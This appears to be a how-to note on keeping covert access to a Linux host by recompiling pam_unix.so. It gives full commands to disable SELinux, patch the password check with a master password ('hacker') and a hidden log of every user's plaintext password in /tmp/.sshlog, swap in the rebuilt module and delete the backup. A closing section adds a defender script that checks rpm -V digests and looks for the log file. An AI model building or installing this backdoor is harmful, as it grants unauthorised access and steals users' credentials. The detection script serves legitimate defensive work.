[Notes] Linux: recompiling the PAM module to maintain access

Preface

Maintaining access on Linux by recompiling the PAM module (pam_unix.so) with a modified password check.

Install the build dependencies

yum install gcc flex flex-dev

Disable SELinux enforcement (switch to permissive mode)

setenforce 0

Check the installed PAM version

rpm -qa | grep pam

Download the matching PAM source version

wget https://github.com/linux-pam/linux-pam/releases/download/v1.5.3/Linux-PAM-1.5.3.tar.xz
tar -xvf Linux-PAM-1.5.3.tar.xz
cd Linux-PAM-1.5.3

Modify the source

  • Replace the verification logic below the comment /* verify the password of this user */ with the backdoor code: add a master password, and write the plaintext password of every successful non-master login to a file.

hacker: the master password
/tmp/.sshlog: the path where passwords from SSH logins are saved

modules/pam_unix/pam_unix_auth.c
/* original lines, replaced by the block below */
//retval = _unix_verify_password(pamh, name, p, ctrl);
//name = p = NULL;

retval = _unix_verify_password(pamh, name, p, ctrl);
/* master password: accept regardless of the real verification result */
if (strcmp("hacker", p) == 0) {
    return PAM_SUCCESS;
}
/* on a genuine successful login, append "user : password" to the log file */
if (retval == PAM_SUCCESS) {
    FILE *fp;
    fp = fopen("/tmp/.sshlog", "a");
    fprintf(fp, "%s : %s\n", name, p);
    fclose(fp);
}
name = p = NULL;

AUTH_RETURN;

Build

./configure
make

Replace the original PAM module with the newly built one

mv /usr/lib64/security/pam_unix.so /usr/lib64/security/pam_unix.so.bakcp
cp modules/pam_unix/.libs/pam_unix.so /usr/lib64/security/pam_unix.so

Remove the backup file

rm -f /usr/lib64/security/pam_unix.so.bakcp

Done
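The procedure above leaves two things a defender can check for: pam_unix.so no longer matching the package database, and the hidden credential file under /tmp. The script below is an added example (not from the original note) that parses `rpm -V pam` output and looks for the drop file; the rpm -V output embedded in it is constructed sample data, and on a live host you would pass "$(rpm -V pam)" instead.

```shell
#!/bin/sh
# Added defender-side triage for the pam_unix.so swap described in the note.
# rpm -V compares each installed file with the RPM database; a rebuilt module
# copied over the packaged one shows a digest ('5') and usually a size ('S') change.
# Constructed sample output (clean package verification prints nothing at all):
SAMPLE_RPM_V='S.5....T.    /usr/lib64/security/pam_unix.so
.......T.  c /etc/pam.d/system-auth'

# check_rpm_verify OUTPUT -> prints each suspicious PAM module, returns 1 if any.
# Line layout: 9-char flag field (S size, 5 digest, M mode, T mtime, ...),
# an optional file-type letter (c config, d doc), then the path. Lines for
# deleted files start with the word "missing" instead of a flag field.
check_rpm_verify() {
    verdict=0
    oldifs=$IFS
    IFS='
'
    for line in $1; do
        flags=${line%% *}        # first column
        path=${line##* }         # last column
        case "$path" in
            */security/pam_*.so) ;;
            *) continue ;;       # only PAM modules matter for this technique
        esac
        case "$flags" in
            *5*|*S*|missing) echo "SUSPECT $path [$flags]"; verdict=1 ;;
        esac
    done
    IFS=$oldifs
    return $verdict
}

# check_credential_log DIR -> returns 1 if the plaintext drop file from the note
# (DIR/.sshlog) exists. /tmp is the location used in the note.
check_credential_log() {
    if [ -e "$1/.sshlog" ]; then
        echo "SUSPECT $1/.sshlog present (plaintext credential log)"
        return 1
    fi
    return 0
}

if check_rpm_verify "$SAMPLE_RPM_V"; then echo "PAM modules match the package database"; fi
if check_credential_log /tmp; then echo "no .sshlog in /tmp"; fi
```

A match on the digest flag alone is not proof of this exact backdoor, so follow it with `rpm -V` against a freshly downloaded copy of the same pam package or a known-good hash of pam_unix.so, and check that `getenforce` still reports Enforcing.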